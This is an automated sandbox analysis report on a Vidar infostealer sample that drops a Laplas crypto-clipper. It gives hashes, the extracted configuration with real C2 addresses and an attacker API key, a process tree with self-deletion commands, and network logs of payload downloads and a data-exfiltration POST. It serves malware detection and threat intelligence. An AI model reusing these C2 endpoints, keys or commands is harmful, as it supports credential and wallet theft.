Analysis

  • max time kernel
    108s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-04-2023 07:40

General

  • Target

    544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe

  • Size

    329KB

  • MD5

    ac97e53dca69adc7f46fc3a6a0f03427

  • SHA1

    1388b68cd15b853d3b24069a076fb6f2520a1714

  • SHA256

    544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c

  • SHA512

    a253d472369d66aacd481150b356a0aadb0db8a83a3c72975380dbcf679dcc064f499ff88cd45db675bcbf15692301174f62fbb65fb3fd02aa48f99b723c3963

  • SSDEEP

    6144:x+pl5A+GPc6uju4rkX2WEF3OYDkGpLlvac3FxC7lARbz:xXbwnjR3OYHLFxQ

Malware Config

Extracted

Family

vidar

Version

3.4

Botnet

e749025c61b2caca10aa829a9e1a65a1

C2

https://steamcommunity.com/profiles/76561199494593681

https://t.me/auftriebs

Attributes
  • profile_id_v2

    e749025c61b2caca10aa829a9e1a65a1

  • user_agent

    Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0

Extracted

Family

laplas

C2

http://185.106.92.74

Attributes
  • api_key

    bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396

Signatures

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
    "C:\Users\Admin\AppData\Local\Temp\544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4656
    • C:\ProgramData\51691604086040263760.exe
      "C:\ProgramData\51691604086040263760.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2780
      • C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe
        "C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        PID:3124
    • C:\ProgramData\57043793385267370343.exe
      "C:\ProgramData\57043793385267370343.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4288
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\ProgramData\57043793385267370343.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2184
        • C:\Windows\system32\choice.exe
          choice /C Y /N /D Y /T 0
          4⤵
            PID:3964
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe" & exit
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2944
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 6
          3⤵
          • Delays execution with timeout.exe
          PID:1448
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 2100
        2⤵
        • Program crash
        PID:1368
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4656 -ip 4656
      1⤵
        PID:1952

      Network

      • flag-us
        DNS
        58.55.71.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        58.55.71.13.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        t.me
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        Remote address:
        8.8.8.8:53
        Request
        t.me
        IN A
        Response
        t.me
        IN A
        149.154.167.99
      • flag-nl
        GET
        https://t.me/auftriebs
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        Remote address:
        149.154.167.99:443
        Request
        GET /auftriebs HTTP/1.1
        X-Id: e749025c61b2caca10aa829a9e1a65a1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
        Host: t.me
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0
        Date: Thu, 13 Apr 2023 07:40:13 GMT
        Content-Type: text/html; charset=utf-8
        Content-Length: 12367
        Connection: keep-alive
        Set-Cookie: stel_ssid=896fdea156f6ef4bec_10485361671066069921; expires=Fri, 14 Apr 2023 07:40:13 GMT; path=/; samesite=None; secure; HttpOnly
        Pragma: no-cache
        Cache-control: no-store
        X-Frame-Options: ALLOW-FROM https://web.telegram.org
        Content-Security-Policy: frame-ancestors https://web.telegram.org
        Strict-Transport-Security: max-age=35768000
      • flag-us
        DNS
        99.167.154.149.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        99.167.154.149.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        41.249.124.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        41.249.124.192.in-addr.arpa
        IN PTR
        Response
        41.249.124.192.in-addr.arpa
        IN PTR
        cloudproxy10041sucurinet
      • flag-de
        GET
        http://195.201.251.197/
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        Remote address:
        195.201.251.197:80
        Request
        GET / HTTP/1.1
        X-Id: e749025c61b2caca10aa829a9e1a65a1
        User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
        Host: 195.201.251.197
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Thu, 13 Apr 2023 07:40:14 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
      • flag-de
        GET
        http://195.201.251.197/download.zip
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        Remote address:
        195.201.251.197:80
        Request
        GET /download.zip HTTP/1.1
        User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
        Host: 195.201.251.197
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Thu, 13 Apr 2023 07:40:14 GMT
        Content-Type: application/zip
        Content-Length: 2685679
        Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT
        Connection: keep-alive
        ETag: "631f30d3-28faef"
        Accept-Ranges: bytes
      • flag-de
        POST
        http://195.201.251.197/
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        Remote address:
        195.201.251.197:80
        Request
        POST / HTTP/1.1
        X-Id: e749025c61b2caca10aa829a9e1a65a1
        X-Token: 5d06d0d635de2431f40d6f3cdfe1a5a2
        X-hwid: c22502d548d63305298366-7669410e-8e67-41c6-8402-8218-806e6f6e6963
        Content-Type: multipart/form-data; boundary=----3170944682749518
        User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
        Host: 195.201.251.197
        Content-Length: 89323
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Thu, 13 Apr 2023 07:40:20 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
      • flag-us
        DNS
        197.251.201.195.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        197.251.201.195.in-addr.arpa
        IN PTR
        Response
        197.251.201.195.in-addr.arpa
        IN PTR
        static197251201195clients your-serverde
      • flag-us
        DNS
        transfer.sh
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        Remote address:
        8.8.8.8:53
        Request
        transfer.sh
        IN A
        Response
        transfer.sh
        IN A
        144.76.136.153
      • flag-de
        GET
        https://transfer.sh/get/8n86mq/sima.exe
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        Remote address:
        144.76.136.153:443
        Request
        GET /get/8n86mq/sima.exe HTTP/1.1
        Host: transfer.sh
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0
        Date: Thu, 13 Apr 2023 07:40:21 GMT
        Content-Type: application/x-ms-dos-executable
        Content-Length: 7567360
        Connection: keep-alive
        Cache-Control: no-store
        Content-Disposition: attachment; filename="sima.exe"
        Retry-After: Thu, 13 Apr 2023 09:40:24 GMT
        X-Made-With: <3 by DutchCoders
        X-Ratelimit-Key: 127.0.0.1,154.61.71.13,154.61.71.13
        X-Ratelimit-Limit: 10
        X-Ratelimit-Rate: 600
        X-Ratelimit-Remaining: 9
        X-Ratelimit-Reset: 1681371624
        X-Remaining-Days: n/a
        X-Remaining-Downloads: n/a
        X-Served-By: Proudly served by DutchCoders
        Strict-Transport-Security: max-age=63072000
      • flag-de
        GET
        https://transfer.sh/get/lqTwP6/pipka.exe
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        Remote address:
        144.76.136.153:443
        Request
        GET /get/lqTwP6/pipka.exe HTTP/1.1
        Host: transfer.sh
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0
        Date: Thu, 13 Apr 2023 07:40:26 GMT
        Content-Type: application/x-ms-dos-executable
        Content-Length: 4514816
        Connection: keep-alive
        Cache-Control: no-store
        Content-Disposition: attachment; filename="pipka.exe"
        Retry-After: Thu, 13 Apr 2023 09:40:30 GMT
        X-Made-With: <3 by DutchCoders
        X-Ratelimit-Key: 127.0.0.1,154.61.71.13,154.61.71.13
        X-Ratelimit-Limit: 10
        X-Ratelimit-Rate: 600
        X-Ratelimit-Remaining: 9
        X-Ratelimit-Reset: 1681371630
        X-Remaining-Days: n/a
        X-Remaining-Downloads: n/a
        X-Served-By: Proudly served by DutchCoders
        Strict-Transport-Security: max-age=63072000
      • flag-us
        DNS
        153.136.76.144.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        153.136.76.144.in-addr.arpa
        IN PTR
        Response
        153.136.76.144.in-addr.arpa
        IN PTR
        transfersh
      • flag-us
        DNS
        67.55.52.23.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        67.55.52.23.in-addr.arpa
        IN PTR
        Response
        67.55.52.23.in-addr.arpa
        IN PTR
        a23-52-55-67deploystaticakamaitechnologiescom
      • flag-us
        DNS
        9.175.53.84.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        9.175.53.84.in-addr.arpa
        IN PTR
        Response
        9.175.53.84.in-addr.arpa
        IN PTR
        a84-53-175-9deploystaticakamaitechnologiescom
      • flag-us
        DNS
        95.221.229.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        95.221.229.192.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        2.136.104.51.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        2.136.104.51.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        13.86.106.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        13.86.106.20.in-addr.arpa
        IN PTR
        Response
      • flag-de
        GET
        http://185.106.92.74/bot/regex
        svcservice.exe
        Remote address:
        185.106.92.74:80
        Request
        GET /bot/regex HTTP/1.1
        Host: 185.106.92.74
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0 (Ubuntu)
        Date: Thu, 13 Apr 2023 07:40:59 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 633
        Connection: keep-alive
      • flag-de
        GET
        http://185.106.92.74/bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396
        svcservice.exe
        Remote address:
        185.106.92.74:80
        Request
        GET /bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396 HTTP/1.1
        Host: 185.106.92.74
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0 (Ubuntu)
        Date: Thu, 13 Apr 2023 07:41:00 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 2
        Connection: keep-alive
      • flag-de
        GET
        http://185.106.92.74/bot/regex
        svcservice.exe
        Remote address:
        185.106.92.74:80
        Request
        GET /bot/regex HTTP/1.1
        Host: 185.106.92.74
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0 (Ubuntu)
        Date: Thu, 13 Apr 2023 07:41:57 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 633
        Connection: keep-alive
      • flag-de
        GET
        http://185.106.92.74/bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396
        svcservice.exe
        Remote address:
        185.106.92.74:80
        Request
        GET /bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396 HTTP/1.1
        Host: 185.106.92.74
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0 (Ubuntu)
        Date: Thu, 13 Apr 2023 07:41:57 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 2
        Connection: keep-alive
      • flag-us
        DNS
        74.92.106.185.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        74.92.106.185.in-addr.arpa
        IN PTR
        Response
        74.92.106.185.in-addr.arpa
        IN PTR
        instance25567waicorenetwork
      • flag-us
        DNS
        74.92.106.185.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        74.92.106.185.in-addr.arpa
        IN PTR
        Response
        74.92.106.185.in-addr.arpa
        IN PTR
        instance25567waicorenetwork
      • flag-us
        DNS
        1.77.109.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        1.77.109.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        171.39.242.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        171.39.242.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        2.36.159.162.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        2.36.159.162.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        171.39.242.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        171.39.242.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        50.23.12.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        50.23.12.20.in-addr.arpa
        IN PTR
        Response
      • 209.197.3.8:80
        260 B
        5
      • 149.154.167.99:443
        https://t.me/auftriebs
        tls, http
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        1.6kB
        19.5kB
        24
        20

        HTTP Request

        GET https://t.me/auftriebs

        HTTP Response

        200
      • 195.201.251.197:80
        http://195.201.251.197/
        http
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        197.4kB
        2.8MB
        2058
        2017

        HTTP Request

        GET http://195.201.251.197/

        HTTP Response

        200

        HTTP Request

        GET http://195.201.251.197/download.zip

        HTTP Response

        200

        HTTP Request

        POST http://195.201.251.197/

        HTTP Response

        200
      • 144.76.136.153:443
        https://transfer.sh/get/lqTwP6/pipka.exe
        tls, http
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        416.8kB
        12.5MB
        8917
        8913

        HTTP Request

        GET https://transfer.sh/get/8n86mq/sima.exe

        HTTP Response

        200

        HTTP Request

        GET https://transfer.sh/get/lqTwP6/pipka.exe

        HTTP Response

        200
      • 52.182.143.210:443
        322 B
        7
      • 20.54.89.15:443
        260 B
        5
      • 185.106.92.74:80
        http://185.106.92.74/bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396
        http
        svcservice.exe
        916 B
        2.3kB
        10
        9

        HTTP Request

        GET http://185.106.92.74/bot/regex

        HTTP Response

        200

        HTTP Request

        GET http://185.106.92.74/bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396

        HTTP Response

        200

        HTTP Request

        GET http://185.106.92.74/bot/regex

        HTTP Response

        200

        HTTP Request

        GET http://185.106.92.74/bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396

        HTTP Response

        200
      • 209.197.3.8:80
        322 B
        7
      • 209.197.3.8:80
        322 B
        7
      • 173.223.113.164:443
        322 B
        7
      • 173.223.113.131:80
        322 B
        7
      • 204.79.197.203:80
        322 B
        7
      • 8.8.8.8:53
        58.55.71.13.in-addr.arpa
        dns
        70 B
        144 B
        1
        1

        DNS Request

        58.55.71.13.in-addr.arpa

      • 8.8.8.8:53
        t.me
        dns
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        50 B
        66 B
        1
        1

        DNS Request

        t.me

        DNS Response

        149.154.167.99

      • 8.8.8.8:53
        99.167.154.149.in-addr.arpa
        dns
        73 B
        166 B
        1
        1

        DNS Request

        99.167.154.149.in-addr.arpa

      • 8.8.8.8:53
        41.249.124.192.in-addr.arpa
        dns
        73 B
        113 B
        1
        1

        DNS Request

        41.249.124.192.in-addr.arpa

      • 8.8.8.8:53
        197.251.201.195.in-addr.arpa
        dns
        74 B
        133 B
        1
        1

        DNS Request

        197.251.201.195.in-addr.arpa

      • 8.8.8.8:53
        transfer.sh
        dns
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        57 B
        73 B
        1
        1

        DNS Request

        transfer.sh

        DNS Response

        144.76.136.153

      • 8.8.8.8:53
        153.136.76.144.in-addr.arpa
        dns
        73 B
        98 B
        1
        1

        DNS Request

        153.136.76.144.in-addr.arpa

      • 8.8.8.8:53
        67.55.52.23.in-addr.arpa
        dns
        70 B
        133 B
        1
        1

        DNS Request

        67.55.52.23.in-addr.arpa

      • 8.8.8.8:53
        9.175.53.84.in-addr.arpa
        dns
        70 B
        133 B
        1
        1

        DNS Request

        9.175.53.84.in-addr.arpa

      • 8.8.8.8:53
        95.221.229.192.in-addr.arpa
        dns
        73 B
        144 B
        1
        1

        DNS Request

        95.221.229.192.in-addr.arpa

      • 8.8.8.8:53
        2.136.104.51.in-addr.arpa
        dns
        71 B
        157 B
        1
        1

        DNS Request

        2.136.104.51.in-addr.arpa

      • 8.8.8.8:53
        13.86.106.20.in-addr.arpa
        dns
        71 B
        157 B
        1
        1

        DNS Request

        13.86.106.20.in-addr.arpa

      • 8.8.8.8:53
        74.92.106.185.in-addr.arpa
        dns
        144 B
        230 B
        2
        2

        DNS Request

        74.92.106.185.in-addr.arpa

        DNS Request

        74.92.106.185.in-addr.arpa

      • 8.8.8.8:53
        1.77.109.52.in-addr.arpa
        dns
        70 B
        144 B
        1
        1

        DNS Request

        1.77.109.52.in-addr.arpa

      • 8.8.8.8:53
        171.39.242.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        171.39.242.20.in-addr.arpa

      • 8.8.8.8:53
        2.36.159.162.in-addr.arpa
        dns
        71 B
        133 B
        1
        1

        DNS Request

        2.36.159.162.in-addr.arpa

      • 8.8.8.8:53
        171.39.242.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        171.39.242.20.in-addr.arpa

      • 8.8.8.8:53
        50.23.12.20.in-addr.arpa
        dns
        70 B
        156 B
        1
        1

        DNS Request

        50.23.12.20.in-addr.arpa

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\51691604086040263760.exe

        Filesize

        7.2MB

        MD5

        c5e0fb4ecaa8a7481a283099d604f7a0

        SHA1

        df4b0c0cc823da2b0443076650c292b43dd9de33

        SHA256

        c6c03e97c5de0c9eb264e4914d8c7f64d7e3528cc696f613e451a294262f3c42

        SHA512

        375677d0cc802b09c7d1532d162a91a8eec4679f7639ef38dca9a9d3a03e20b3ab54707af7ffb138d00ec93ea4b34b6db0b33f365dc888ff9056c808a239bc57

      • C:\ProgramData\51691604086040263760.exe

        Filesize

        7.2MB

        MD5

        c5e0fb4ecaa8a7481a283099d604f7a0

        SHA1

        df4b0c0cc823da2b0443076650c292b43dd9de33

        SHA256

        c6c03e97c5de0c9eb264e4914d8c7f64d7e3528cc696f613e451a294262f3c42

        SHA512

        375677d0cc802b09c7d1532d162a91a8eec4679f7639ef38dca9a9d3a03e20b3ab54707af7ffb138d00ec93ea4b34b6db0b33f365dc888ff9056c808a239bc57

      • C:\ProgramData\51691604086040263760.exe

        Filesize

        7.2MB

        MD5

        c5e0fb4ecaa8a7481a283099d604f7a0

        SHA1

        df4b0c0cc823da2b0443076650c292b43dd9de33

        SHA256

        c6c03e97c5de0c9eb264e4914d8c7f64d7e3528cc696f613e451a294262f3c42

        SHA512

        375677d0cc802b09c7d1532d162a91a8eec4679f7639ef38dca9a9d3a03e20b3ab54707af7ffb138d00ec93ea4b34b6db0b33f365dc888ff9056c808a239bc57

      • C:\ProgramData\57043793385267370343.exe

        Filesize

        4.3MB

        MD5

        c4ab3149ef02a36d663699a8c541933e

        SHA1

        67088f5eff9ec575775b711c9e3650d12d7f4d5c

        SHA256

        0a0fbd6af9e5d110118f02b87f9a92f9f58fb100f6d9883d55a6aae6c548b4ce

        SHA512

        88b10f81b2cd273fefeffb4c2078807e89b4b756d50110b61e9f89092715f29ba8d1803f64bc971c1293dc624b92d0b7f05612ae661dd8d24e47d39047a4b7b4

      • C:\ProgramData\57043793385267370343.exe

        Filesize

        4.3MB

        MD5

        c4ab3149ef02a36d663699a8c541933e

        SHA1

        67088f5eff9ec575775b711c9e3650d12d7f4d5c

        SHA256

        0a0fbd6af9e5d110118f02b87f9a92f9f58fb100f6d9883d55a6aae6c548b4ce

        SHA512

        88b10f81b2cd273fefeffb4c2078807e89b4b756d50110b61e9f89092715f29ba8d1803f64bc971c1293dc624b92d0b7f05612ae661dd8d24e47d39047a4b7b4

      • C:\ProgramData\57043793385267370343.exe

        Filesize

        4.3MB

        MD5

        c4ab3149ef02a36d663699a8c541933e

        SHA1

        67088f5eff9ec575775b711c9e3650d12d7f4d5c

        SHA256

        0a0fbd6af9e5d110118f02b87f9a92f9f58fb100f6d9883d55a6aae6c548b4ce

        SHA512

        88b10f81b2cd273fefeffb4c2078807e89b4b756d50110b61e9f89092715f29ba8d1803f64bc971c1293dc624b92d0b7f05612ae661dd8d24e47d39047a4b7b4

      • C:\ProgramData\mozglue.dll

        Filesize

        593KB

        MD5

        c8fd9be83bc728cc04beffafc2907fe9

        SHA1

        95ab9f701e0024cedfbd312bcfe4e726744c4f2e

        SHA256

        ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

        SHA512

        fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

      • C:\ProgramData\nss3.dll

        Filesize

        2.0MB

        MD5

        1cc453cdf74f31e4d913ff9c10acdde2

        SHA1

        6e85eae544d6e965f15fa5c39700fa7202f3aafe

        SHA256

        ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

        SHA512

        dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

      • C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe

        Filesize

        837.2MB

        MD5

        6fb91749bfaa5cf0b15c3915dd1b459c

        SHA1

        5e64c709daee7a71e1f65ebe0374a8b887435700

        SHA256

        0ad598bcfbdd22cd31012caced54fedcfeb2762fa1cfa1594e647848254b3f66

        SHA512

        aaa7fdc3248ee2750c13081c9758f8e9b3cbcdb23f218ed41b67bedbef32063c3b574254bf9dbaef0eac912bfa6ad40dcfb6412898b4a0d4f9a39a5a2f745cfb

      • C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe

        Filesize

        837.2MB

        MD5

        6fb91749bfaa5cf0b15c3915dd1b459c

        SHA1

        5e64c709daee7a71e1f65ebe0374a8b887435700

        SHA256

        0ad598bcfbdd22cd31012caced54fedcfeb2762fa1cfa1594e647848254b3f66

        SHA512

        aaa7fdc3248ee2750c13081c9758f8e9b3cbcdb23f218ed41b67bedbef32063c3b574254bf9dbaef0eac912bfa6ad40dcfb6412898b4a0d4f9a39a5a2f745cfb

      • memory/2780-236-0x0000000000550000-0x000000000108A000-memory.dmp

        Filesize

        11.2MB

      • memory/2780-235-0x0000000000530000-0x0000000000531000-memory.dmp

        Filesize

        4KB

      • memory/2780-234-0x00000000004C0000-0x00000000004C1000-memory.dmp

        Filesize

        4KB

      • memory/3124-263-0x00000000011D0000-0x00000000011D1000-memory.dmp

        Filesize

        4KB

      • memory/3124-264-0x00000000011E0000-0x00000000011E1000-memory.dmp

        Filesize

        4KB

      • memory/3124-265-0x0000000000550000-0x000000000108A000-memory.dmp

        Filesize

        11.2MB

      • memory/4288-248-0x0000000000D10000-0x0000000001B73000-memory.dmp

        Filesize

        14.4MB

      • memory/4288-262-0x0000000000D10000-0x0000000001B73000-memory.dmp

        Filesize

        14.4MB

      • memory/4656-134-0x00000000020D0000-0x0000000002127000-memory.dmp

        Filesize

        348KB

      • memory/4656-249-0x0000000000400000-0x00000000004C2000-memory.dmp

        Filesize

        776KB

      • memory/4656-222-0x0000000000400000-0x00000000004C2000-memory.dmp

        Filesize

        776KB

      • memory/4656-146-0x0000000061E00000-0x0000000061EF3000-memory.dmp

        Filesize

        972KB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.